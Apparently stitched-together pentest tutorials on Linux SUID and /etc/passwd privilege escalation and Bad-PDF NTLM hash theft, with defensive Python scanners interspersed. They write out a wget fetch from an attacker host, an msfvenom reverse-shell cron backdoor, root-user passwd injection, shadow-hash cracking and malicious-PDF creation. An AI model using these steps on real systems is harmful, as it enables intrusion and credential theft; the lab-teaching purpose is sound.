Linux Privilege Escalation using SUID Binaries


In our previous article we discussed “Privilege Escalation in Linux using etc/passwd file”, and today we will learn “Privilege Escalation in Linux using SUID Permission.” While solving CTF challenges we always check SUID permissions on files and commands as a route to privilege escalation, so it is very important to know what SUID is, how to set SUID and how SUID helps in privilege escalation. You can read our previous articles where we applied this trick for privilege escalation. Open the links given below:
Link 1:  Hack the Box Challenge: Bank Walkthrough
Link 2: Hack the Box Challenge: Haircut Walkthrough

Let’s Start with Theoretical Concept !!

As we all know, in Linux everything is a file, including directories and devices, and each file carries permissions that allow or restrict three operations: read, write and execute. So when you set permissions on a file, you should be aware of which Linux users you are going to allow or restrict for each of the three operations. Take a look at the following image.




Hence it is clear that the maximum value used to set permissions for each user class is 7, which is the sum of read (4), write (2) and execute (1). For example, if you set chmod 755, it will appear as rwxr-xr-x.

But when special permissions are added to these classes, they become SUID, SGID and the sticky bit. When the extra bit “4” is set for the user (owner) it becomes SUID (Set User ID), when bit “2” is set for the group it becomes SGID (Set Group ID), and the sticky bit “1” is set on a directory in which other users are allowed to create or delete files.
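As an added illustration (not part of the original article), the following Python maps a numeric mode to the ls-style string and back, including the special bits, so that 4755, 2755 and 1777 can be read off as rwsr-xr-x, rwxr-sr-x and rwxrwxrwt:

```python
import stat

# Added example, not from the original article: the arithmetic behind
# "chmod 755 -> rwxr-xr-x" extended to the special bits (SUID 4, SGID 2,
# sticky 1). Feed it 0o4755 or int("4755", 8).

# One (read, write, execute, special, letter) tuple per user class, in ls order.
_CLASSES = (
    (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR, stat.S_ISUID, "s"),  # owner: SUID
    (stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP, stat.S_ISGID, "s"),  # group: SGID
    (stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH, stat.S_ISVTX, "t"),  # other: sticky
)


def mode_to_symbolic(mode: int) -> str:
    """Render the 12 permission bits of `mode` the way `ls -l` prints them."""
    out = []
    for r, w, x, special, letter in _CLASSES:
        out.append("r" if mode & r else "-")
        out.append("w" if mode & w else "-")
        if mode & special:
            # lower-case s/t: special bit plus execute; upper-case S/T: special
            # bit on a non-executable slot, almost always a misconfiguration
            out.append(letter if mode & x else letter.upper())
        else:
            out.append("x" if mode & x else "-")
    return "".join(out)


def symbolic_to_mode(symbolic: str) -> int:
    """Inverse of mode_to_symbolic: 'rwsr-xr-x' -> 0o4755."""
    if len(symbolic) != 9:
        raise ValueError("expected a 9-character permission string")
    mode = 0
    chunks = (symbolic[0:3], symbolic[3:6], symbolic[6:9])
    for (r, w, x, special, letter), chunk in zip(_CLASSES, chunks):
        if chunk[0] == "r":
            mode |= r
        if chunk[1] == "w":
            mode |= w
        if chunk[2] in (letter, letter.upper()):
            mode |= special
        if chunk[2] in ("x", letter):   # lower-case letter implies execute too
            mode |= x
    return mode


def special_bits(mode: int) -> list[str]:
    """Names of the special bits set in `mode`, e.g. ['SUID'] for 0o4755."""
    names = []
    if mode & stat.S_ISUID:
        names.append("SUID")
    if mode & stat.S_ISGID:
        names.append("SGID")
    if mode & stat.S_ISVTX:
        names.append("sticky")
    return names
```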




What is SUID Permission?
SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user (the file's owner) rather than their own. Files with SUID permission run with higher privileges. Assume we are accessing the target system as a non-root user and we find SUID-enabled binaries owned by root; those files/programs/commands can then run with root privileges.

How to set SUID?
Basically, you can change the permission of any file using either the "numerical" method or the "symbolic" method. As a result, the x is replaced by an s, as shown in the image below, which denotes special execute permission with the higher privilege for that file/command. Since we are enabling SUID for the owner (user), bit 4, or the symbol s, is added to the owner's read/write/execute triplet.




If you execute the ls -al command with the file name and observe a small ‘s’ as in the above image, it means the SUID bit is enabled for that file and it can be run with the owner's (here root's) privileges.


How does SUID help in privilege escalation?
In Linux, some existing binaries and commands can be used by a non-root user to escalate privileges to root if the SUID bit is enabled. Some well-known Linux/Unix executables that can allow privilege escalation are: Bash, Cat, cp, echo, find, Less, More, Nano, Nmap, Vim.
Let's go deeper through practical work. First, create a user that is not in the sudo group. Here we have added user “ignite”, whose UID is 1001 and GID is 1001; hence ignite is a non-root user.




Privilege Escalation by Copy Command
If the SUID bit is enabled for the cp command, which is used to copy data, it can lead to privilege escalation to root. For example, suppose you (the system admin) want to give SUID permission to the cp command. You can follow the steps below to identify its location and current permissions, and then enable the SUID bit by changing the permissions.
which cp
ls -al /bin/cp
chmod u+s /bin/cp




1st Method
On the other hand, start your attacking machine, first compromise the target system and then move to the privilege escalation phase. Suppose I successfully log in to the victim’s machine through SSH and get a non-root user terminal. Then, using the following command, you can enumerate all binaries with SUID permission.
find / -perm -u=s -type f 2>/dev/null
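As an added example (not code from the original article), this Python performs the same enumeration as the find command above and then applies the triage a system administrator would use on the result: the names in SHELL_CAPABLE are the binaries the article lists as escalation paths, and BASELINE is a constructed, deliberately short stand-in for an inventory taken from a known-good host.

```python
import os
import stat
from typing import Iterable, NamedTuple

# Added example, not code from the original article: the Python equivalent of
# `find / -perm -u=s -type f 2>/dev/null`, followed by defender-side triage.
# SHELL_CAPABLE lists the binaries the article names as escalation paths when
# SUID is set; BASELINE is constructed and deliberately short, standing in for
# an inventory taken from a known-good host of the same build.

class FileRecord(NamedTuple):
    path: str
    mode: int   # st_mode: file type, special bits and permission bits
    uid: int    # numeric owner

SHELL_CAPABLE = {"bash", "cat", "cp", "echo", "find", "less", "more",
                 "nano", "nmap", "vim", "vim.basic"}

BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount",
            "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
            "/usr/bin/newgrp"}   # constructed; build the real list from a clean host

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "info": 3}


def scan(roots: Iterable[str]) -> list[FileRecord]:
    """Collect regular files with the SUID bit set under roots; symlinks are not followed."""
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:       # unreadable or vanished entry, the 2>/dev/null case
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.append(FileRecord(path, st.st_mode, st.st_uid))
    return found


def triage(records: Iterable[FileRecord], baseline=BASELINE) -> list[tuple[str, str, str]]:
    """Rank each SUID file as (severity, path, reason), most severe first."""
    findings = []
    for rec in records:
        name = os.path.basename(rec.path)
        if rec.mode & (stat.S_IWGRP | stat.S_IWOTH):
            # anyone who can write the file can replace what runs as its owner
            findings.append(("critical", rec.path, "SUID binary writable by group or others"))
        elif rec.uid == 0 and name in SHELL_CAPABLE:
            findings.append(("critical", rec.path,
                             f"root-owned SUID {name} can spawn a shell or write arbitrary files"))
        elif rec.uid == 0 and rec.path not in baseline:
            findings.append(("high", rec.path, "root-owned SUID binary absent from baseline"))
        elif rec.uid != 0:
            findings.append(("medium", rec.path, f"SUID binary owned by uid {rec.uid}"))
        else:
            findings.append(("info", rec.path, "expected SUID binary"))
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f[0]])


if __name__ == "__main__":
    for sev, path, reason in triage(scan(["/usr", "/bin", "/sbin", "/opt", "/home"])):
        if sev != "info":
            print(f"{sev:8} {path}  {reason}")
```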




In the above image you can see many files listed, but we are interested in /bin/cp, because now we can copy the /etc/passwd file to read the user list. Therefore I copy the passwd file into the HTML directory.
cp /etc/passwd /var/www/html




On the other hand, we have generated a new encrypted (hashed) password for pass123 using openssl passwd.




We have copied the passwd file into the web directory, i.e. /var/www/html, so I can open it through the web browser, copy the entire content of the passwd file into a text file, and then add our own user with root UID, GID and home directory.
In our previous article, we already discussed how to add a user to /etc/passwd using the openssl passwd utility.




Run a Python HTTP server to transfer our edited passwd file to the target machine.
python -m SimpleHTTPServer 80




As we all know, the /tmp directory allows everyone to create or delete files, so we download our passwd file there. Once it is downloaded, we copy /tmp/passwd over /etc/passwd, which overwrites the original passwd file.
cd /tmp
wget http://192.168.1.108/passwd
cp passwd /etc/passwd

With the help of the tail command, we confirm that our user "hack" is now part of the /etc/passwd file. Since we have added our own user with root privileges, let's switch to it and get root.

su hack
whoami

And yes!! This is an incredible way to escalate to root privileges.




2nd Method
Similarly, we can also transfer our backdoor to the target system if the SUID bit is enabled for the cp command. Here we have generated a netcat backdoor for a reverse connection using the msfvenom command.
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.108 lport=1234 R




Then copy the above-highlighted code, paste it into a text file beginning with #!/bin/bash, and it is ready to transfer to the target system; I have saved it as raj.sh.




Now, we are all aware of the Linux crontab utility, which runs files hourly, daily, weekly and monthly, so I copied raj.sh into /etc/cron.hourly. Hence it will run raj.sh after one hour.
cp raj.sh /etc/cron.hourly/
ls -al /etc/cron.hourly/




On the other hand, we started a Netcat listener in a new terminal, and as the hour passed it gave us a reverse connection from the target system with root privileges.
Hence we saw how a single cp command can lead to privilege escalation if the SUID bit is on. You can try your own way to escalate to root privileges using the cp command.




Privilege Escalation by Using Find Command
Similarly, we can escalate to root if the SUID bit is on for the find command. For example, suppose you (the system admin) want to give SUID permission to the find command. You can follow the steps below to identify its location and current permissions, and then enable the SUID bit by changing the permissions.
which find
ls -al /usr/bin/find
chmod u+s /usr/bin/find




Again compromise the target system and move to the privilege escalation phase as done above. Then, using the following command, you can enumerate all binaries with SUID permission.
find / -perm -u=s -type f 2>/dev/null
So here we learn that the SUID bit is enabled for the find command, which means we can execute any command through find's -exec action. To do so, first we create an empty file “raj” and then run the whoami command as shown below.
touch raj
find raj -exec "whoami" \;
If an attacker finds the SUID bit set on /usr/bin/find, it allows him to execute any malicious command, such as a netcat or /bin/bash shell, or to fetch important system information for privilege escalation.




Privilege Escalation by Using Vim
Similarly, we can escalate to root if the SUID bit is on for the Vim editor. For example, suppose you (the system admin) want to give SUID permission to the Vim editor. You can follow the steps below to identify its location and current permissions, and then enable the SUID bit by changing the permissions.
which vim
ls -al /usr/bin/vim
ls -al /etc/alternatives/vim
chmod u+s /usr/bin/vim.basic

You will find vim.basic by following the symlinks, as shown in the image below.




Again compromise the target system and move to the privilege escalation phase as done above. Then, using the following command, you can enumerate all binaries that have SUID permission.
find / -perm -u=s -type f 2>/dev/null
So here we learn that the SUID bit is enabled for /usr/bin/vim.basic, and hence we can now edit through vim any file that would otherwise be editable only by a sudo or root user.




As we know, ignite is a non-root user with the least permissions; since vim has SUID permission, we can edit the sudoers file through it and change the permissions for user “ignite”. So we open the sudoers file by typing the visudo command and give all permissions to user “ignite” as shown in the image.
ignite   ALL=(ALL:ALL) ALL




Now let's get root access as shown in the image below.
sudo -l
sudo bash
id

Great!! This trick also works superbly for privilege escalation.




Privilege Escalation by Running a Script
There is a good chance of finding some kind of script for a system or program call; it can be a PHP, Python or C script. Suppose you (the system admin) want to give SUID permission to a C program which provides a bash shell on execution.
So here we have coded a C program which calls system() to spawn a bash shell and saved it as “asroot.c”.




Then create a rootshell directory inside /bin, copy the asroot.c file into the rootshell directory and run the gcc compiler to compile it.
mkdir /bin/rootshell
cd /bin/rootshell
cp /home/raj/Desktop/asroot.c .
ls
gcc asroot.c -o shell
chmod u+s shell
ls -al shell




Now again compromise the target system and use the find command to identify binaries with SUID permission.
find / -perm -u=s -type f 2>/dev/null
So here we learn that the SUID bit is enabled for many binaries, but we are interested in /bin/rootshell/shell. So we move into the /bin/rootshell directory and run the binary “shell”; as a result we get root access as shown below.
cd /bin/rootshell
./shell
id

Thus we saw how we can escalate to root if the SUID bit is enabled on a script or program. It is unlikely that you will find a script that simply calls a bash shell, but if you find any script with SUID permission, you can use the above techniques to modify its content to get a bash shell.




Privilege Escalation by Using Nano
Similarly, we can escalate to root if the SUID bit is on for the nano editor. For example, suppose you (the system admin) want to give SUID permission to the nano editor. You can follow the steps below to identify its location and current permissions, and then enable the SUID bit by changing the permissions.
which nano
ls -al /bin/nano
chmod u+s /bin/nano




Again compromise the target system and move to the privilege escalation phase as done above. Then, using the following command, you can enumerate all binaries with SUID permission.
find / -perm -u=s -type f 2>/dev/null
So here we learn that the SUID bit is enabled for /bin/nano, so let’s open the /etc/passwd file to add our own user as done above, using openssl passwd.




On the other hand, I have generated a new encrypted (hashed) password for 123 using openssl passwd.




Now open the passwd file with the nano editor and add your own user as done above. Here you can observe that I have created a demo user with an encrypted password on the victim’s system.
nano /etc/passwd




Since we have added our own user with root privileges, let’s switch to it and get root.

su demo
id





2nd Method
If the SUID bit is enabled for /bin/nano, then we can steal the password hashes from the /etc/shadow file. So after compromising the target machine we opened the shadow file in the nano editor and copied the encrypted password set for user raj.




Now paste the copied hash into a text file, save it as "hash" on the desktop, and then use John the Ripper to crack it as shown below. It gives raj:123 as the password; now try to log in to the target system through the raj account.

So today we have demonstrated how SUID permission can lead to privilege escalation even when it is given to ordinary commands and programs such as cp, cat, nano and vim.


Capture NTLM Hashes using PDF (Bad-Pdf)


Today we are demonstrating stealing NTLM hashes through a PDF file. We have already discussed various methods to capture NTLM hashes in a network in our previous article. Recently a new tool, “Bad-PDF”, was released, and in this article we are sharing our experience with it.
Bad-PDF creates a malicious PDF to steal NTLM (NTLMv1/NTLMv2) hashes from Windows machines; it uses a vulnerability disclosed by the Check Point team to create the malicious PDF file. Bad-PDF reads the NTLM hashes using a Responder listener.
This method works for all PDF readers (any version), JavaScript is not required for the attack, and most EDR/endpoint solutions fail to detect it.
git clone https://github.com/deepzec/Bad-Pdf.git
cd Bad-Pdf
ls
chmod 777 badpdf.py




Now run the Python file with the following command:
python badpdf.py
Then it will try to connect to Responder through its default path, i.e. /usr/bin/responder, but in our case the location of Responder is /usr/sbin/responder. After that it will ask for your network IP, the name of the output file and the interface name; submit this information as per your network.




Then it will create a malicious PDF file named bad.pdf; now transfer this PDF file to your target.




So, when the victim opens our malicious file, his NTLM hash will be captured as shown in the image below. Here you can observe the username ‘raj’ along with its password hash. Now copy the hash value into a text document so that you can crack it to retrieve the password.




We pasted the hash value into a text file and saved it as "hash" on the desktop. Then we used John the Ripper to crack the hash.
john hash
Awesome!!! We have retrieved the password 133 for user raj.


Privilege Escalation in Linux using etc/passwd file

In this article, we will focus on exploring diverse techniques to modify the etc/passwd file, enabling us to create or alter a user and grant them root privileges. It becomes crucial to understand how to edit your own user within the /etc/passwd file when dealing with privilege escalation on the compromised system. If you're interested, we have previously demonstrated this method for privilege escalation in our earlier articles. You can find the links below.

Table of Contents

About /etc/passwd file

· Understand the basics

· Adding a new user to the /etc/passwd file

Different methods to create a password for the /etc/passwd file

· OpenSSL

· Mkpasswd

· Python

· Perl

· PHP

· Ruby

· Bonus: Hack Trick

 

Firstly, we should understand the /etc/passwd file in depth before getting to the point. Inside the /etc directory we find three very important files: passwd, group and shadow.

/etc/passwd: A human-readable text file which stores user account information.

/etc/group: Also a human-readable text file; it stores group information, and which groups a user belongs to can be identified through this file.

/etc/shadow: A file that contains the encrypted (hashed) passwords and account expiry information for each user.

The format of entries in the /etc/passwd file







Description of each field

Username: The first field indicates the name of the user, which is used to log in.

Encrypted password: An x denotes that the encrypted password is actually stored in the /etc/shadow file. If the user does not have a password, the password field will have an * (asterisk).

User ID (UID): Every user must be allotted a user ID (UID). UID 0 (zero) is reserved for the root user, UIDs 1-99 are reserved for other predefined accounts, and UIDs 100-999 are reserved by the system for administrative purposes. UID 1000 is almost always the first non-system user, usually an administrator. If we create a new user on our Ubuntu system, it will be given UID 1001.

Group ID (GID): It denotes the primary group of each user; as with UIDs, the first 100 GIDs are usually reserved for system use. GID 0 is the root group and GID 1000 usually signifies the users. New groups are generally allotted GIDs beginning from 1000.

GECOS field: Usually this is a set of comma-separated values that give more details about the user. The GECOS field carries the following information:

User’s full name

Building and room number or contact person

Office telephone number

Shell: The full path of the default shell that executes the user's commands and displays the results.

NOTE: Each field is separated by a colon (:).

Let’s Start Now!!

Adding User by Default Method

Let’s start by reading the /etc/passwd file with the cat command to view the users present in our system.

cat /etc/passwd



From the image above you can see that “pentest” is the last user, with UID 1000. Here GID 1000 denotes that it is a non-system user.

Let's see what happens in the /etc/passwd file when we add a user with the adduser command. Here you can clearly match the following information with the image below.

adduser user1

Username: user1

GID: 1001

UID: 1001

Enter password: (Hidden)

Home Directory: /home/user1

Other fields: Full Name, Room Number, Work Phone, Home Phone, Other (left blank)

 


When you open the /etc/passwd file you will notice that all the above information has been stored in it.

 


Repeat the steps again, adding user2 to the /etc/passwd file.

 


Now check with the tail command: user2 has been successfully added to /etc/passwd and the following information is recorded accordingly.

GID: 1002

UID: 1002

Enter password: (Hidden)

Home Directory: /home/user2

 


For this privilege escalation it is required that the /etc/passwd file be writable by the logged-in user. So, for the lab setup, we give ‘rwx’ permissions on the passwd file.

chmod 777 /etc/passwd

 


Now our lab setup is done.

Possible Scenarios:

If /etc/passwd file is editable what would be the possible scenarios to escalate the privileges?

Scenario 1: Replace the password hash for existing users in /etc/passwd file with our encrypted password.

Scenario 2: Manually add a new root privilege user to /etc/passwd file with our encrypted password.

Scenario 3: Tampering with the password of root or another high-privilege user in the /etc/passwd file.

Let's start now!

Connect to this machine with SSH:

ssh pentest@192.168.1.22

tail /etc/passwd

ls -al /etc/passwd

 


It is clearly visible that the /etc/passwd file has all permissions.

OpenSSL

Sometimes, running the passwd command to set a user password might not be feasible. In such situations, the OpenSSL command can be used. It generates a salted encrypted (hashed) password.

OpenSSL is a widely used open-source library that provides various cryptographic functions, protocols, and tools for securing communications over computer networks. The openssl passwd command allows you to generate password hashes for different algorithms, such as DES, MD5, SHA-256, and more.

Method 1

Here, we generated the password hash on our Kali machine.

openssl passwd raj

 


$1$ indicates that the generated password is an MD5-crypt hash.

Now use this salted password hash for the “aarti” user, using the echo command to append the entry to /etc/passwd.

echo 'aarti:$1$cJ05ZYPP$06zg1KtuJ/CbzTWPmeyNH1:0:0:root:/root:/bin/bash' >> /etc/passwd

Here you can observe that we have allotted UID 0, GID 0 and home directory /root, hence we have given root privileges to our user “aarti”. Now switch user, access the terminal as aarti and confirm root access.

tail /etc/passwd

su aarti

id

 


Method 2

This is relevant when OpenSSL is present on the victim's system, allowing us to create the password hash on the victim's machine itself.

openssl passwd 123

echo 'user3:ghTC5HTjVd/7M:0:0:root:/root:/bin/bash' >> /etc/passwd

tail /etc/passwd

Now switch user and access the terminal through user3 and confirm the root access.

su user3

id

 


Cool!!! Both methods are working.

Mkpasswd

It is an alternative to OpenSSL. mkpasswd is a command-line tool for producing password hashes for diverse authentication systems.

mkpasswd -m <method> <password>

Here, <method> specifies the hash algorithm (like sha-512, md5, etc.), and <password> is the password you want to hash.

mkpasswd -m SHA-512 pass123

 


You can use the same method as above to add the password to the /etc/passwd file, or edit it manually.

nano /etc/passwd

In the image below you can observe that I have allotted UID 0, GID 0 and home directory /root, hence we have given root privileges to our user4.

 

Now switch user and access the terminal through user4 and confirm the root access.

su user4

id



Great!!! It is also working.

Python

Python allows us to add a salt to our password, producing an encrypted (hashed) password that embeds the salt value.

python2 -c 'import crypt; print crypt.crypt("pass123", "$6$salt")'

If the above command does not work, you can use python3, or check the installed Python version with the “which python” command.

python3 -c 'import crypt; print (crypt.crypt("pass123", "$6$salt"))'

 

Use any method to edit /etc/passwd, put the encrypted password in it, and switch to user5. Here we used the nano editor.

su user5

id

 


It is also working.

Perl

Similarly, we can create a hash of our password with a salt value using Perl along with crypt.

perl -le 'print crypt("pass123", "abc")'

 


You will get the encrypted password; repeat the manual step of adding a new user "user6" and putting the encrypted value into the password field with the echo command in the terminal.

echo 'user6:abBxjdJQWn8xw:0:0:root:/root:/bin/bash' >> /etc/passwd

Here you can see that we have allotted UID 0, GID 0 and home directory /root, hence we have given root privileges to our user6. Switch to the new user user6.

su user6

id

 


Great!! This method is also working.

PHP

The hash for our password may also be created using PHP along with crypt and a salt value.

php -r "print(crypt('aarti','123') . \"\n\");"

 


You will get the encrypted password; repeat the same method of adding a new user "user7" and putting the encrypted value into the password field with the echo command in the terminal.

echo 'user7:121z.fuKOKzx.:0:0:root:/root:/bin/bash' >> /etc/passwd

In the image below you can observe that we have allotted UID 0, GID 0 and home directory /root, hence we have given root privileges to our user7.

tail -n 2 /etc/passwd

su user7

id

 


Working!!!

Ruby

As we have already used Python, Perl and PHP, in the same way Ruby can be used to create an encrypted password with crypt and a salt value.

ruby -r 'digest' -e 'puts "pass".crypt("$6$salt")'

 


Use any of the above ways to edit /etc/passwd and switch to the new user user8.

su user8

id

 


This is also working.

Bonus: Hack Trick

If you are too lazy to perform any of the above methods, you should try this!!!

If the /etc/passwd file has -rwxrwxrwx permissions on the victim system, open /etc/passwd and remove the ‘x’ or ‘*’ value in the root user's password field, as shown in the image below:

 


Methodology: The 'x' value in the /etc/passwd file indicates that the actual password hash is stored in the /etc/shadow file (or a similar location), rather than in the /etc/passwd file itself.

If you remove the 'x' value and replace it with something else or leave it blank, the root user's password will no longer be stored securely and the system won't be able to authenticate the root user using the stored password hash from the /etc/shadow file.

Keep the root password blank and save the /etc/passwd file.

root::0:0:root:/root:/bin/bash

 


Now, switch to the root user.

su root

id



Boom… you have root access without a password. You can use this method on other high-privilege user accounts.

Hence there are many ways to escalate privileges via an editable /etc/passwd.
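As an added example (not part of the original article), the following Python is the administrator's counterpart to everything above: it parses /etc/passwd content and flags the three scenarios (an additional UID 0 account, a hash placed directly in the password field, a blanked root password) and names the crypt(3) format of any inline hash by its prefix, as in the "$1$ indicates MD5" note in the OpenSSL method. The sample lines are constructed and reuse the hash values shown above.

```python
import re
from typing import NamedTuple

# Added example, not part of the original article: a defender-side audit of
# /etc/passwd content that flags the exact edits shown above (an additional
# UID 0 user, a hash placed directly in the password field, a blanked root
# password) and names the crypt(3) format of any inline hash by its prefix.

class PasswdEntry(NamedTuple):
    name: str
    password: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

# Modular-crypt prefixes: the text between the first two '$' names the algorithm.
HASH_PREFIXES = {"$1$": "MD5-crypt", "$2b$": "bcrypt", "$5$": "SHA-256-crypt",
                 "$6$": "SHA-512-crypt", "$y$": "yescrypt"}


def identify_hash(field: str) -> str:
    """Classify the second field of a passwd line."""
    if field == "x":
        return "shadowed"     # the real hash lives in /etc/shadow
    if field == "":
        return "empty"        # su succeeds without asking for a password
    if field.startswith(("*", "!")):
        return "locked"       # no hash can ever match
    for prefix, algo in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return algo
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "DES-crypt"    # classic 13-character crypt, as from the perl/php one-liners
    return "unknown"


def parse_passwd(text: str) -> tuple[list[PasswdEntry], list[str]]:
    """Parse passwd text; malformed lines are reported rather than skipped silently."""
    entries, errors = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            errors.append(f"line {lineno}: expected 7 fields, got {len(fields)}")
            continue
        try:
            uid, gid = int(fields[2]), int(fields[3])
        except ValueError:
            errors.append(f"line {lineno}: non-numeric UID or GID")
            continue
        entries.append(PasswdEntry(fields[0], fields[1], uid, gid, *fields[4:]))
    return entries, errors


def audit(text: str) -> list[tuple[str, str, str]]:
    """Return (severity, username, finding) tuples; an empty list means clean."""
    entries, errors = parse_passwd(text)
    findings = [("high", "-", err) for err in errors]
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(("critical", e.name, "additional UID 0 account"))
        kind = identify_hash(e.password)
        if kind == "empty":
            findings.append(("critical", e.name, "empty password field"))
        elif kind not in ("shadowed", "locked"):
            findings.append(("high", e.name, f"hash stored in /etc/passwd ({kind})"))
    return findings


# Constructed samples: a normal tail of /etc/passwd plus the two entries from the
# OpenSSL methods above, and the blanked root entry from the bonus trick.
TAMPERED = ("root:x:0:0:root:/root:/bin/bash\n"
            "pentest:x:1000:1000:pentest,,,:/home/pentest:/bin/bash\n"
            "aarti:$1$cJ05ZYPP$06zg1KtuJ/CbzTWPmeyNH1:0:0:root:/root:/bin/bash\n"
            "user3:ghTC5HTjVd/7M:0:0:root:/root:/bin/bash\n")
BLANK_ROOT = "root::0:0:root:/root:/bin/bash\n"
```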